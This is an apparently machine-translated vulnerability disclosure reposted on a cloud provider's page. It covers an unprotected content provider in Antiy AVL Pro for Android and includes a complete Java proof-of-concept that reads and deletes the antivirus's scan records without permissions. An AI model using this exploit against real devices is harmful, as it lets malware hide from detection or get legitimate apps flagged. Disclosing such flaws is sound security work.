The Antiy vulnerability can cause virus-free or mistaken removal of legitimate software.

Source: Internet
Author: User

The Antiy vulnerability can cause virus-free or mistaken removal of legitimate software.

The android version of Antiy avl pro has a vulnerability. If used by viruses or Trojans, the vulnerability can be detected by avl scans.

After avl pro detects and removes mobile phones, the results are saved in the db first, and then the scan information is read and displayed to the user through the provider. If there is a virus, the system prompts you to delete or clear the mobile phone.

The provider name is content: // com. antiy. avlpro. MyProvider, but the provider has no permission to expose it.

As a result, any apk can be accessed without any special permissions, and the contents in the database can be read, deleted, or inserted.

Therefore, if malicious programs exploit this vulnerability, content insertion can be constructed to lead to avl misjudgment/deletion of normal and legal apk; or real-time (or short-time thread polling) if you see your package in the db, delete it to avoid killing it.

Poc:

 

package com.ieroot.android_providerdemo;import android.net.Uri;import android.os.Bundle;import android.app.Activity;import android.content.ContentResolver;import android.database.Cursor;import android.view.Menu;import android.view.View;import android.view.View.OnClickListener;import android.widget.Button;import android.widget.TextView;import android.widget.Toast;public class MainActivity extends Activity implements OnClickListener{@Overrideprotected void onCreate(Bundle savedInstanceState) {super.onCreate(savedInstanceState);setContentView(R.layout.activity_main);TextView tView = (TextView)findViewById(R.id.result);tView.setText(getData());// add onclick listenerButton show = (Button)findViewById(R.id.show);show.setOnClickListener(this);Button delete = (Button)findViewById(R.id.delete);delete.setOnClickListener(this);}@Overridepublic boolean onCreateOptionsMenu(Menu menu) {// Inflate the menu; this adds items to the action bar if it is present.getMenuInflater().inflate(R.menu.main, menu);return true;}public String  getData() {String avlUri = "content://com.antiy.avlpro.MyProvider";String resultString = "";ContentResolver resolver = this.getContentResolver();Cursor cursor = resolver.query(Uri.parse(avlUri), new String[]{"pkg_name","v_name"}, null, null, null);while (cursor.moveToNext()) {String pkg_name = cursor.getString(cursor.getColumnIndex("pkg_name"));String v_name = cursor.getString(cursor.getColumnIndex("v_name"));resultString += pkg_name + "\t" + v_name;}return resultString;}public void deleteData() {String avlUri = "content://com.antiy.avlpro.MyProvider";ContentResolver resolver = this.getContentResolver();resolver.delete(Uri.parse(avlUri), "pkg_name = 'com.tf.thinkdroid.sg'", null);Toast.makeText(this, "delete is clicked", 0);}@Overridepublic void onClick(View arg0) {// TODO Auto-generated method stubif (arg0.getId() == R.id.show) {TextView tView = (TextView)findViewById(R.id.result);tView.setText("show : " + "\n" + getData());}if (arg0.getId() == R.id.delete){deleteData();}}}





In order to prove the process clearly, we will split the steps and explain them one by one. In actual use, users will not see any of these processes. We can only bear the results: viruses are not found or legal programs are scanned and killed.

:

Avl removes a risk in this figure. Remember the name.

Figure 1,


 

In this figure, the POC program reads the content in the db through the exposed provider.

Figure 2,

Click Delete button to delete the content in the database.

In this figure, the content in the db is empty.

Figure 3,

Return to the avlpro interface and display 0 threats:

Figure 4,





 

That is to say, if the POC program does not apply for any permissions, the avl pro discriminant result is successfully modified.
Divergent thinking ~~

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.